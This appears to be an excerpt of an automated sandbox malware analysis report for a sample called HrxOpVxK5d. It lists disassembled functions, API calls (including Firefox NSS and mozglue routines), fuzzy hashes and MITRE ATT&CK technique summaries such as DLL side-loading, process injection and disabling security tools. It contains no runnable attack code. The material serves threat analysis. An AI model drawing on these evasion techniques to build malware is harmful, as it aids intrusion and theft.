Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: f999888fea3ecd31b8f0e6c125358d2865330ef66e702f644cf080db515b72b4
Instruction ID: db44dd7aa17aaa9d0c3aa00f2dc780ab33e4cbf991a8fd8ceb50b2cb5eb9c6db
Opcode Fuzzy Hash: f999888fea3ecd31b8f0e6c125358d2865330ef66e702f644cf080db515b72b4
Instruction Fuzzy Hash: 5A113D71505A00DBD700AFB8D48469ABBF4BF49714F01496ADD88DB700EB70E8958BD2

Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
wsprintfA.USER32 ref: 00417B83

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5

Function 6D02AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6D015F17,?,?,?,?,?,?,?,?,6D01AAD4), ref: 6D02AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6D015F17,?,?,?,?,?,?,?,?,6D01AAD4), ref: 6D02ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6D01AAD4), ref: 6D02ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6D01AAD4), ref: 6D02ACDB

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: d26dc0fbedc3a8333238e7c9f0f67b3740161a846801da6e4ebba32511a69974
Instruction ID: 51b82b55f308546b461c191f2bbb3687711e01fef947a26a57f4ad5cf8505c46
Opcode Fuzzy Hash: d26dc0fbedc3a8333238e7c9f0f67b3740161a846801da6e4ebba32511a69974
Instruction Fuzzy Hash: 85015EB5601B129BE750DF29D908B53B7E8BF04659B60483AD85AC3A00EB35F055CB91

Function 6CFEC590 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CFEC5AD

Part of subcall function 6CFE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CF887ED,00000800,6CF7EF74,00000000), ref: 6CFE1000
Part of subcall function 6CFE0FF0: PR_NewLock.NSS3(?,00000800,6CF7EF74,00000000), ref: 6CFE1016
Part of subcall function 6CFE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CF887ED,00000008,?,00000800,6CF7EF74,00000000), ref: 6CFE102B

CERT_DecodeCertPackage.NSS3(?,?,6CFEC610,?), ref: 6CFEC5C2

Part of subcall function 6CFEC0B0: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFEC0E6

CERT_NewTempCertificate.NSS3(?,00000000,00000000,00000001), ref: 6CFEC5E0
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFEC5EF

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Arena_Util$ArenaCertCertificateDecodeErrorFreeInitLockPackagePoolTempcalloc
String ID:
API String ID: 1454898856-0
Opcode ID: f32ce10cd0629f9c69a95737a661b8f5666798b870ae0722aca6f9fda49d6cb1
Instruction ID: 7a353b87b7319c44aa803646786f5e21d8ebdb2bd4f783bdf809e65fd4b5851a
Opcode Fuzzy Hash: f32ce10cd0629f9c69a95737a661b8f5666798b870ae0722aca6f9fda49d6cb1
Instruction Fuzzy Hash: 2201A2B1D002047BEB00AB65DC06FBF7B78DB05618F454079FD199B241F672AD18C6E1

Function 6CFE24E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CFBC154,000000FF,00000000,00000000,00000000,00000000,?,?,6CFBC154,?), ref: 6CFE24FA
PORT_Alloc_Util.NSS3(00000000,?,6CFBC154,?), ref: 6CFE2509

Part of subcall function 6CFE0BE0: malloc.MOZGLUE(6CFD8D2D,?,00000000,?), ref: 6CFE0BF8
Part of subcall function 6CFE0BE0: TlsGetValue.KERNEL32(6CFD8D2D,?,00000000,?), ref: 6CFE0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6CFE2525
free.MOZGLUE(00000000), ref: 6CFE2532

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: c488028e1d097dfa070453bc2c6072ab04c0662a2f64eb9a1c71a6e098d300fc
Instruction ID: efeffd0c75eb1ef70abc549833ad3c1debd17cf2874f59760f3f68c028bd6349
Opcode Fuzzy Hash: c488028e1d097dfa070453bc2c6072ab04c0662a2f64eb9a1c71a6e098d300fc
Instruction Fuzzy Hash: A8F096B670622637FA1016B65C49E7739ACDB4A7F9B140231BD28C66C0EE61C801C5F1

Function 6D02AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6D015D40,00000000,?,?,6D006AC6,6D01639C), ref: 6D02AC2D

Part of subcall function 6CFCADC0: TlsGetValue.KERNEL32(?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE10
Part of subcall function 6CFCADC0: EnterCriticalSection.KERNEL32(?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE24
Part of subcall function 6CFCADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CFAD079,00000000,00000001), ref: 6CFCAE5A
Part of subcall function 6CFCADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE6F
Part of subcall function 6CFCADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAE7F
Part of subcall function 6CFCADC0: TlsGetValue.KERNEL32(?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAEB1
Part of subcall function 6CFCADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CFACDBB,?,6CFAD079,00000000,00000001), ref: 6CFCAEC9

PK11_FreeSymKey.NSS3(?,6D015D40,00000000,?,?,6D006AC6,6D01639C), ref: 6D02AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6D015D40,00000000,?,?,6D006AC6,6D01639C), ref: 6D02AC59
free.MOZGLUE(8CB6FF01,6D006AC6,6D01639C,?,?,?,?,?,?,?,?,?,6D015D40,00000000,?,6D01AAD4), ref: 6D02AC62

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: d53b931ae15f71f332ba70b4b4940ddb9663ae36607f5007a880b46c30523cc8
Instruction ID: 441a40e15c8493b979a69c31f519c1b8e28e76a5bba822eb24070a94df4ef58b
Opcode Fuzzy Hash: d53b931ae15f71f332ba70b4b4940ddb9663ae36607f5007a880b46c30523cc8
Instruction Fuzzy Hash: 6B014BB56012119FEF00CF18E8C0F5677E8AF44718F2880A9E9498F306DB31F849CBA2

Function 6D010450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6D014710,?,000F4240,00000000), ref: 6D01046B
GetLastError.KERNEL32(?,6D014710,?,000F4240,00000000), ref: 6D010479

Part of subcall function 6D02BF80: TlsGetValue.KERNEL32(00000000,?,6D01461B,-00000004), ref: 6D02C244

PR_Unlock.NSS3(40C70845,?,6D014710,?,000F4240,00000000), ref: 6D010492
PR_SetError.NSS3(FFFFE89D,00000000,?,6D014710,?,000F4240,00000000), ref: 6D0104A5

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 8a410e7af08f05c2b5e8bc3042e5cf54927ae31513fb37e1f2576e4ed216d2fe
Instruction ID: a5b5a172fe0902a21c83a94ed16773c336e3864d7fb2ec0143a94c51688c9178
Opcode Fuzzy Hash: 8a410e7af08f05c2b5e8bc3042e5cf54927ae31513fb37e1f2576e4ed216d2fe
Instruction Fuzzy Hash: A4F0B4F0B1C2169BFB009BF6DC98B2A32E9AB05309F458435E94AC7550EF21E4608665

Function 6D09CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6D09CC61
free.MOZGLUE ref: 6D09CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6D09CC80
free.MOZGLUE(?), ref: 6D09CC87

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 937da90d29bbce38637d7e1ac82e98648e33aefa16ce951fa76d831a0c78f401
Instruction ID: f38aa4e6aecce5f878e2d91b31611eb2059694eb0bb90e0c32fff233b958dfb1
Opcode Fuzzy Hash: 937da90d29bbce38637d7e1ac82e98648e33aefa16ce951fa76d831a0c78f401
Instruction Fuzzy Hash: 0BE065766006189FCA10DFA8DC44C8777BCEE4D2747150526EA91C3700D731F915CBE5

Function 6CFD4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CFD4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CFD4DE6

Strings

%d.%d, xrefs: 6CFD4DDE

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: bafd79a8d7778574e9f138560ddac503f098f1d3a4f9ed3d31785a41ae33da2d
Instruction ID: 9a551362e1e57060cf5bc44aa12191f4ed7c31e26696722a64b86b0471c29016
Opcode Fuzzy Hash: bafd79a8d7778574e9f138560ddac503f098f1d3a4f9ed3d31785a41ae33da2d
Instruction Fuzzy Hash: 8D31FEB1D042186BFB109FA19C05BFF7B78DF45308F0A0429ED159B781EB71A905CBA2

Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

q?A, xrefs: 00413ED2

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Find$CloseFileNextlstrcat
String ID: q?A
API String ID: 3840410801-4084695119
Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55

Function 6CFE0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CFE0DF5
TlsGetValue.KERNEL32 ref: 6CFE0E2D
TlsGetValue.KERNEL32 ref: 6CFE0E58
TlsGetValue.KERNEL32 ref: 6CFE0E84

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 492f000f47389f859f83dd8cf282cddbc2f2ff24331f0338194a9dd520535283
Instruction ID: f46f6c95002603130de8468fc69deb921f1ddddc410334c3d9c512cec2ab2f1c
Opcode Fuzzy Hash: 492f000f47389f859f83dd8cf282cddbc2f2ff24331f0338194a9dd520535283
Instruction Fuzzy Hash: B531C3B15443859BDB109F78D4447E97BB4BF4D308F01467ED888CBA21EFB59085DB92

Function 6CF3A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6CF3A468,00000000), ref: 6CF3A4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6CF3A468,00000000), ref: 6CF3A51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CF3A468,?,6CF3A468,00000000), ref: 6CF3A545
memcpy.VCRUNTIME140(00000001,6CF3A468,00000001,?,?,?,6CF3A468,00000000), ref: 6CF3A57D

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction ID: 9e6906bc34b7b19ea01579c66bff1d564e8476dc845d6f95ff5a9d9cb2ed32ae
Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
Instruction Fuzzy Hash: 6E11DAB3D05325A7EF0089FA9C8169B77D9AF55268F291235EE28CB3C0F735990486F1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

